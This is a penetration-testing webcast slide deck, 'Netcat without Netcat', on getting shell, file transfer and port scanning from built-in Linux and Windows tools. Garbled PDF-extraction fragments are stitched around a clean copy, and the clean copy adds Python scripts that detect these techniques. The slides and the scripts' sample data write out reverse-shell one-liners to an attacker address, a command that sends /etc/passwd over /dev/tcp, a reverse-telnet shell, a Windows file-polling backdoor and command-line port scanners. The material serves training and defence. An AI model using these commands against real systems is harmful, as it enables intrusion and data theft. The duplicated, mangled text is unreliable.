bull Wersquoll rely on built-in tools only

bull Remember those old ATampT commercials ndash Have you ever kissed your baby goodnighthellip from a payphone

ndash Have you ever made a command shell backdoor using Linuxrsquos devtcp

ndash Have you ever shoveled shell using Linux telnet clients ndash Have you ever made a port scanner using a Windows FTP client

ndash Have you ever made the Windows file system behave like acommand shell

bull YOU WILL

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 13

Why Netcat without Netcatbull For penetration testers

ndash Netcat functionality is very useful in making one systemattack another machine

ndash But the projectrsquos rules of engagement may prohibitinstallation of additional software such as Netcat on

compromised targets ndash Some anti-virus tools detect and block Netcat

ndash Live off the land Be a command-line MacGyver

ndash Where wersquore going we donrsquot need Netcat

Attacker

ConqueredTarget

Next Target

S h e l l

a c c ess

sca na na ly z eex p lo it

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 14

Useful Netcat Functionsbull As wersquove seen Netcat can be used in countless

different waysbull Letrsquos pick some of the most useful and see how we

can make built-in tools do each function on Linux and

Windows ndash Backdoor shell

ndash File transfer

ndash Port scanner

bull Wersquoll vary the order in which we do each action aswersquoll build from fundamental principles to morecomplex techniques

ndash And the order of those principles differs between Linux andWindows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 15

Linuxbull devtcp rocks

bull On most Linux variants (except Debian-derivedsystems like Ubuntu) the default built-in bash canredirect to and from devtcp[IPaddr][port]

ndash Opens a connection with the target IPaddr on that portbull With a little command-line magic we can use this for

Netcat-like behavior

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 16

Linux Command-Line File

Transfer

bull To send a file we can just redirect itscontents into devtcp[IPaddr][port] as in

bull $ cat etcpasswd gt

devtcp[IPaddr][port]bull Catch it on the other side with a Netcat

listener

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 17

Linux Command-Line

Backdoor via devtcpbull We can connect Standard In Standard Out and Standard Error

of a bash shell to devtcp to implement a reverse shellbackdoor

binbash ndashi gt

devtcp[Attacker_IPaddr][port] 0ltamp1

2gtamp1

bull Shovels a shell from the victim Linux machine to attackerrsquoswaiting Netcat listener where commands can be entered

binbash ndashi gt

devtcp

[Attacker_IPaddr]

[port] 0ltamp1 2gtamp1

Firewall

Blocks

incoming

Protected Servernc ndashl ndashp [p]

TYPE COMMANDS

HERE

Commands

executed

here

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 18

Linux Command-Line Reverse

Shell Backdoor In Action

Li C d Li P t

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 1939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 19

Linux Command-Line Port

Scannerbull To see if a single port is open we could run$ echo gt devtcp[IPaddr][port]

bull Note that the ldquoConnection Refusedrdquo text is not placed onStandard Output or Standard Error ndash The shell puts them in line so we cannot redirect them to a file

Port 80 is listening

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 20

Storing Results and Iterating

bull But it does set the error condition variable ldquo$rdquo to 0 if the port is open 1 if it is closed

bull For a port scanner we could use a while loop

that increments through port numbers$ port=1 while [ $port ndashlt 1024 ] doecho gt devtcp[IPaddr]$port [ $ ==

0 ] ampamp echo $port is open gtgttmpportstxt port=`expr $port + 1`done

bull We append results in the loop (gtgt tmpportstxt) so that they can be tailed whilethe scan is running ndash I want this to be as operationally clean as possible for

pen testers

d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 21

Command-Line Port Scanner

In Action

5 Not Closed

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22

Linux Command-Line

Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote

shell without using devtcpbull Linux telnet clients let us redirect Standard In and

Standard Out

bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |

binbash | telnet [attacker_IPaddr][port2]

bull Provide commands on attackerrsquos machine via port1

bull Receive output on attackerrsquos machine on port2

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23

Reverse Telnet Shell in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24

Windowsbull Built-in command-line has very clunky syntax

bull Also telnet and ftp clients are absolutelyatrocious

ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out

bull Thus we will build Netcat-without-Netcat

from some fundamental command-linebuilding blocks in Windows

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25

Building Blocks

Windows FOR Loopsbull Iteration can be very helpful

ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of

itemsbull Numbers

bull Lines in a file

bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter

ndash FOR F Iterate over file contents strings or commandoutput

bull See the first webcast in this series for details on how

these workhellip we wonrsquot go through them again here

Windows Port Scanner Using

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26

Windows Port Scanner Using

Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i

bull Problem When it finds an open port it hangsbull How to address

ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume

ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where

name=telnetexe delete amp ping -n 6 127001

ndash Downside Race condition may kill one that hasnrsquot finished checking

M P bl ith Wi d

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27

More Problems with Windows

Telnet Client as a Port Scannerbull Other problems

ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client

ndash Attempts at redirection either make it hang or not run

bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option

bull So you have to watch it sadly

ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land

bull There must be a better way

Wi d P t S U i

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28

Windows Port Scanner Using

FTP Clientbull Windows FTP client Cgt ftp [IPaddr]

bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21

bull Solution But you can specify dest port in an FTP

command file ndash open [IPaddr] [port]

bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]

bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file

displaying or storing results at each iteration

Th Wi d C d Li

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29

The Windows Command Line

Port Scanner Using FTP Clientbull Cgt for L i in (111024) do

echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt

bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad

bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly

Making It Store Results

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30

Making It Store Resultsbull Cgt for L i in

(111024) do

echo Checking

Port i gtgt

portstxt amp echoopen [IP_addr] i

gt ftptxt amp echo

quit gtgt ftptxt ampftp -sftptxt

2gtgtportstxt

Windows Command Line File Transfer

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31

Windows Command-Line File Transfer

bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on

the command line redirecting to shares

bull Cgt type [filename] gt[machine][share][filename]

bull Will use current user credentialshellip

bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]

bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands

across the network not just files

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32

File Transfer in Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33

Backdoors The File Shellbull Now letrsquos do a backdoor

bull Listening on a port is hardhellipbull But we can look in the file system

bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file

bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

What Is Netcat?

• Netcat: General-purpose TCP and UDP network widget running on Linux/Unix and Windows
• Takes Standard In and sends it across the network
• Receives data from the network and puts it on Standard Out
• Messages from Netcat itself are put on Standard Error

(Diagram: Netcat sits between The System and The Network; Std In is sent as packets, received packets go to Std Out, and Netcat's own messages go to Std Err)

What Can Netcat Do for Us?

• Send files
• Port scan
• Backdoor shell access
• Connecting to arbitrary open ports
• Vulnerability scanning
• Simple chats
• Replay data in TCP or UDP packets
• Relays bouncing between systems
• Much, much more…

What Is Netcat Without Netcat?

• Netcat without Netcat involves constructing commands that achieve Netcat behavior…
  – …without the use of Netcat
• We'll rely on built-in tools only
• Remember those old AT&T commercials?
  – Have you ever kissed your baby goodnight… from a payphone?
  – Have you ever made a command shell backdoor using Linux's /dev/tcp?
  – Have you ever shoveled shell using Linux telnet clients?
  – Have you ever made a port scanner using a Windows FTP client?
  – Have you ever made the Windows file system behave like a command shell?
• YOU WILL

Why Netcat without Netcat?

• For penetration testers:
  – Netcat functionality is very useful in making one system attack another machine
  – But the project's rules of engagement may prohibit installation of additional software, such as Netcat, on compromised targets
  – Some anti-virus tools detect and block Netcat
  – Live off the land: Be a command-line MacGyver
  – Where we're going, we don't need Netcat

(Diagram: Attacker has shell access to the Conquered Target, which is used to scan, analyze and exploit the Next Target)

Useful Netcat Functions

• As we've seen, Netcat can be used in countless different ways
• Let's pick some of the most useful and see how we can make built-in tools do each function on Linux and Windows:
  – Backdoor shell
  – File transfer
  – Port scanner
• We'll vary the order in which we do each action, as we'll build from fundamental principles to more complex techniques
  – And the order of those principles differs between Linux and Windows

Linux

• /dev/tcp rocks
• On most Linux variants (except Debian-derived systems like Ubuntu), the default built-in bash can redirect to and from /dev/tcp/[IPaddr]/[port]
  – Opens a connection with the target IPaddr on that port
• With a little command-line magic, we can use this for Netcat-like behavior

Linux Command-Line File Transfer

• To send a file, we can just redirect its contents into /dev/tcp/[IPaddr]/[port], as in:
  $ cat /etc/passwd > /dev/tcp/[IPaddr]/[port]
• Catch it on the other side with a Netcat listener

Linux Command-Line Backdoor via /dev/tcp

• We can connect Standard In, Standard Out, and Standard Error of a bash shell to /dev/tcp to implement a reverse shell backdoor:
  /bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1
• Shovels a shell from the victim Linux machine to the attacker's waiting Netcat listener, where commands can be entered

(Diagram: on the Protected Server, behind a firewall that blocks incoming connections, "/bin/bash -i > /dev/tcp/[Attacker_IPaddr]/[port] 0<&1 2>&1" runs and commands are executed there; on the attacker's machine "nc -l -p [p]" waits and commands are typed there)

Linux Command-Line Reverse Shell Backdoor In Action

(Screenshot slide)

Linux Command-Line Port Scanner

• To see if a single port is open, we could run:
  $ echo > /dev/tcp/[IPaddr]/[port]
• Note that the "Connection Refused" text is not placed on Standard Output or Standard Error
  – The shell puts them in line, so we cannot redirect them to a file

(Screenshot annotation: Port 80 is listening)

Storing Results and Iterating

• But it does set the error condition variable "$?" to 0 if the port is open, 1 if it is closed
• For a port scanner, we could use a while loop that increments through port numbers:
  $ port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/[IPaddr]/$port; [ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done
• We append results in the loop (>> /tmp/ports.txt) so that they can be tailed while the scan is running
  – I want this to be as operationally clean as possible for pen testers

Command-Line Port Scanner In Action

(Screenshot slide)

Linux Command-Line Backdoor via "Reverse Telnet"

• There's a whole different way we can get a remote shell without using /dev/tcp
• Linux telnet clients let us redirect Standard In and Standard Out
• Gives rise to "Reverse telnet"
• On the target machine, we could run:
  $ telnet [attacker_IPaddr] [port1] | /bin/bash | telnet [attacker_IPaddr] [port2]
• Provide commands on the attacker's machine via port1
• Receive output on the attacker's machine on port2
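Every Linux trick on the preceding slides (file transfer and reverse shell through /dev/tcp, the while-loop scanner, reverse telnet) is a plain execve() of bash or telnet with a distinctive command string, which is exactly what a defender can audit for. The script below is an added detection example and is not part of the webcast: it classifies auditd-style EXECVE records into those four patterns. The audit lines, addresses and event ids are constructed, and the records are assumed to be in quoted argv form (raw auditd hex-encodes any argument that contains spaces or quotes, so decode those first).

```python
"""Detect the Linux 'Netcat without Netcat' tricks in execve audit records.

Added example, not from the webcast. Input: auditd-style EXECVE records in
quoted argv form (decode hex-encoded arguments before feeding them in).
"""
import re

# Constructed sample records: four mirror the slides, two are benign and must not fire.
SAMPLE_AUDIT_LINES = [
    'type=EXECVE msg=audit(1218700001.101:401): argc=3 a0="/bin/bash" a1="-c" '
    'a2="/bin/bash -i > /dev/tcp/192.0.2.10/4444 0<&1 2>&1"',
    'type=EXECVE msg=audit(1218700002.202:402): argc=3 a0="/bin/sh" a1="-c" '
    'a2="telnet 192.0.2.10 8080 | /bin/bash | telnet 192.0.2.10 8081"',
    'type=EXECVE msg=audit(1218700003.303:403): argc=3 a0="/bin/bash" a1="-c" '
    'a2="port=1; while [ $port -lt 1024 ]; do echo > /dev/tcp/10.0.0.5/$port; '
    '[ $? == 0 ] && echo $port is open >> /tmp/ports.txt; port=`expr $port + 1`; done"',
    'type=EXECVE msg=audit(1218700004.404:404): argc=3 a0="/bin/bash" a1="-c" '
    'a2="cat /etc/passwd > /dev/tcp/192.0.2.10/9000"',
    'type=EXECVE msg=audit(1218700005.505:405): argc=3 a0="/bin/bash" a1="-c" '
    'a2="grep -r tcp /proc/net/dev"',
    'type=EXECVE msg=audit(1218700006.606:406): argc=2 a0="/usr/bin/telnet" a1="mail.example.com"',
]

AUDIT_ID = re.compile(r"msg=audit\([\d.]+:(\d+)\)")
ARGV = re.compile(r'\ba(\d+)="((?:[^"\\]|\\.)*)"')
DEV_TCP = re.compile(r"/dev/(?:tcp|udp)/([^/\s]+)/(\$?\w+)")   # host and port (or $var)
INTERACTIVE_SHELL = re.compile(r"\b(?:ba)?sh\s+-i\b")
FD_DUP = re.compile(r"\d<&\d")                                  # e.g. 0<&1: stdin wired to the socket
LOOP = re.compile(r"\b(?:while|for|until)\b")
REVERSE_TELNET = re.compile(r"\btelnet\b[^|]*\|\s*(?:/bin/)?(?:ba)?sh\b[^|]*\|\s*telnet\b")


def parse_execve(line):
    """Return (event id, argv list) from one quoted-form EXECVE record."""
    ident = AUDIT_ID.search(line)
    argv = [v for _, v in sorted((int(n), v) for n, v in ARGV.findall(line))]
    return (ident.group(1) if ident else None), argv


def command_string(argv):
    """The shell text that actually ran: the -c payload when there is one."""
    if len(argv) >= 3 and argv[1] == "-c":
        return argv[2]
    return " ".join(argv)


def classify(cmd):
    """Return (technique, endpoint) pairs found in one command string."""
    findings = []
    m = DEV_TCP.search(cmd)
    if m:
        endpoint = "%s:%s" % (m.group(1), m.group(2))
        if INTERACTIVE_SHELL.search(cmd) and FD_DUP.search(cmd):
            findings.append(("reverse_shell_devtcp", endpoint))   # interactive shell on a socket
        elif LOOP.search(cmd) and m.group(2).startswith("$"):
            findings.append(("port_scan_devtcp", endpoint))       # port taken from a loop variable
        else:
            findings.append(("devtcp_redirect", endpoint))        # one-shot transfer, e.g. cat > /dev/tcp
    if REVERSE_TELNET.search(cmd):
        findings.append(("reverse_telnet_shell", None))           # telnet | shell | telnet
    return findings


def scan_audit_log(lines):
    """Run classify() over every EXECVE record and return the findings in log order."""
    findings = []
    for line in lines:
        if "type=EXECVE" not in line:
            continue
        event_id, argv = parse_execve(line)
        cmd = command_string(argv)
        for technique, endpoint in classify(cmd):
            findings.append({"event": event_id, "technique": technique,
                             "endpoint": endpoint, "cmd": cmd})
    return findings


if __name__ == "__main__":
    for f in scan_audit_log(SAMPLE_AUDIT_LINES):
        print(f["event"], f["technique"], f["endpoint"] or "-", f["cmd"])
```

The point of keying on the command string rather than on a binary name is the webcast's own: nothing here is Netcat, so a control that only watches for nc on disk sees none of it, while an execve audit rule (auditd `-S execve`) sees all of it.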

Reverse Telnet Shell in Action

(Screenshot slide)

Windows

• Built-in command line has very clunky syntax
• Also, telnet and ftp clients are absolutely atrocious
  – Especially in the way that they (don't) interact with Standard In and Standard Out
• Thus, we will build Netcat-without-Netcat from some fundamental command-line building blocks in Windows

Building Blocks: Windows FOR Loops

• Iteration can be very helpful
  – We're not expecting you to be programmers
  – But sometimes you'll want to iterate over a given set of items:
    • Numbers
    • Lines in a file
• The Windows command line supports several kinds of FOR loops… some of the most useful are:
  – FOR /L: Counter
  – FOR /F: Iterate over file contents, strings, or command output
• See the first webcast in this series for details on how these work… we won't go through them again here

Windows Port Scanner Using Telnet Client

• We could systematically telnet to port after port:
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-[ and then type quit to resume
  – Or kill the telnet client every 5 seconds:
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking

More Problems with Windows Telnet Client as a Port Scanner

• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
  – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way

Windows Port Scanner Using FTP Client

• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify the dest port in an FTP command file:
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with:
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration

The Windows Command Line Port Scanner Using FTP Client

• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly

Making It Store Results

• C:\> for /L %i in (1,1,1024) do echo Checking Port %i >> ports.txt & echo open [IP_addr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt 2>>ports.txt

Windows Command-Line File Transfer

• File transfer on arbitrary ports is hard
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  – C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials…
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files

File Transfer in Action

(Screenshot slide)

Backdoors: The File Shell

• Now, let's do a backdoor
• Listening on a port is hard…
• But we can look in the file system
• A FOR loop can spin, looking for a command in a file, run the command, and dump output to another file:
  – C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1

Using the File Shell

• Now we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block…
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or rely on nslookup to pull domain names that include commands
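The Windows techniques are harder to catch by command string alone, because the pieces (ftp.exe, ping.exe, cmd.exe, a file on a share) are all ordinary, but each loop has a rhythm that is not: the FTP-client scanner launches a scripted ftp.exe for every port, the telnet and file-shell loops use ping -n against 127.0.0.1 as a sleep, and the file shell creates, consumes and deletes the same command file over and over while another file grows. The script below is an added behavioural-detection example covering both the FTP-client port scanner and the file shell slides; it is not from the webcast. It runs over a constructed host event stream (host names, share paths and timings are made up); in practice the same logic would be fed from process-creation telemetry and file-access auditing on the share.

```python
"""Behavioural detection of the Windows 'Netcat without Netcat' loops.

Added example, not from the webcast. Consumes a constructed event stream of
process creations and file actions; hosts, paths and timings are invented.
"""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float      # seconds (constructed epoch values)
    kind: str      # "process" or "file"
    host: str
    detail: str    # process: command line; file: "ACTION path"


def _build_sample():
    """Construct a synthetic timeline mirroring the FTP scanner and file shell loops."""
    ev = []
    # FTP-client port scan on WS01: one scripted ftp.exe per port every 0.5 s,
    # stalling ~30 s on the single open port (the client waits for a banner).
    t = 1218700000.0
    for i in range(1, 26):
        ev.append(Event(t, "process", "WS01", "ftp -s:ftp.txt"))
        t += 30.0 if i == 7 else 0.5
    # File shell on SRV01: commands.txt appears on the share, output.txt grows,
    # commands.txt is deleted, and a loopback ping serves as a ~1 s sleep.
    t = 1218700100.0
    share = r"\\SRV01\public"
    for _ in range(12):
        ev.append(Event(t, "file", "SRV01", "CREATE " + share + r"\commands.txt"))
        ev.append(Event(t + 0.3, "file", "SRV01", "WRITE " + share + r"\output.txt"))
        ev.append(Event(t + 0.5, "file", "SRV01", "DELETE " + share + r"\commands.txt"))
        ev.append(Event(t + 0.6, "process", "SRV01", "ping -n 2 127.0.0.1"))
        t += 1.6
    # Benign noise that must not fire: an interactive ftp session and a document edit.
    ev.append(Event(1218700300.0, "process", "WS02", "ftp files.example.com"))
    ev.append(Event(1218700301.0, "file", "SRV01", "CREATE " + share + r"\report.docx"))
    ev.append(Event(1218700302.0, "file", "SRV01", "WRITE " + share + r"\report.docx"))
    return sorted(ev, key=lambda e: e.ts)


SAMPLE_EVENTS = _build_sample()


def is_scripted_ftp(cmd):
    c = cmd.lstrip().lower()
    return c.startswith("ftp") and "-s:" in c


def is_loopback_ping(cmd):
    c = cmd.lstrip().lower()
    return c.startswith("ping") and "127.0.0.1" in c


def detect_process_bursts(events, matcher, label, window=60.0, threshold=10):
    """Report a host once when matching launches reach `threshold` within any `window` seconds."""
    recent = defaultdict(deque)
    hits = []
    for e in events:
        if e.kind != "process" or not matcher(e.detail):
            continue
        q = recent[e.host]
        q.append(e.ts)
        while e.ts - q[0] > window:      # drop launches that fell out of the window
            q.popleft()
        if len(q) == threshold:
            hits.append({"host": e.host, "label": label, "first": q[0], "last": e.ts})
    return hits


def detect_file_shell(events, min_cycles=5, max_cycle=5.0):
    """Report a file that is repeatedly created, followed by a write elsewhere, then deleted."""
    created = {}                 # (host, path) -> creation time of a pending cycle
    writes = defaultdict(list)   # host -> [(ts, path)]
    cycles = defaultdict(int)    # (host, command file, output file) -> completed cycles
    hits = []
    for e in events:
        if e.kind != "file":
            continue
        action, path = e.detail.split(" ", 1)
        key = (e.host, path)
        if action == "CREATE":
            created[key] = e.ts
        elif action == "WRITE":
            writes[e.host].append((e.ts, path))
        elif action == "DELETE" and key in created:
            t0 = created.pop(key)
            if e.ts - t0 > max_cycle:
                continue                 # slow create/delete is normal file churn
            outputs = {p for ts, p in writes[e.host] if t0 <= ts <= e.ts and p != path}
            for out in outputs:
                k = (e.host, path, out)
                cycles[k] += 1
                if cycles[k] == min_cycles:
                    hits.append({"host": e.host, "label": "file_shell_polling",
                                 "command_file": path, "output_file": out})
    return hits


def run_detections(events):
    hits = detect_process_bursts(events, is_scripted_ftp, "ftp_script_burst")
    hits += detect_process_bursts(events, is_loopback_ping, "loopback_ping_loop")
    hits += detect_file_shell(events)
    return hits


if __name__ == "__main__":
    for h in run_detections(SAMPLE_EVENTS):
        print(h)
```

Thresholds are deliberately loose (ten launches a minute, five create/write/delete cycles) so that the 30-second stall on an open port, which the slides note for the FTP scanner, does not break the burst count; tune them against your own baseline of scripted ftp.exe use before alerting on them.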

The File Shell In Action

(Screenshot slide)

Outline

• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A

Conclusions

• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals

Follow-Up

• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code PENTEST20
• Discount applies to the 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home, On-Line, Skoudis
  – July 24-29, Wash. DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va. Beach, Strand
• Go to www.sans.org and look for "560" for details

Outline

• Why Penetration Testing?
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008


Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34

Using the File Shell

bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt

bull And we can read results by using type to read[IP_addr][share]outputtxt

bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea

ndash Use FTP client to move commands on arbitrary portswriting them into the file system

ndash Or rely on nslookup to pull domain names that includecommands

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35

The File Shell In Action

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36

Outline

bull Building a Penetration TestInfrastructure

bull Netcat without Netcatbull Conclusions

bull QampA

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739

Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37

Conclusionsbull Netcat without Netcat shows that with only individual

command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box

bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves

bull Penetration testers need to be able to make the most

of built-in tools to operate within the rules of engagement for their projects

bull Netcat without Netcat serves these goals

Follo Up

8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat

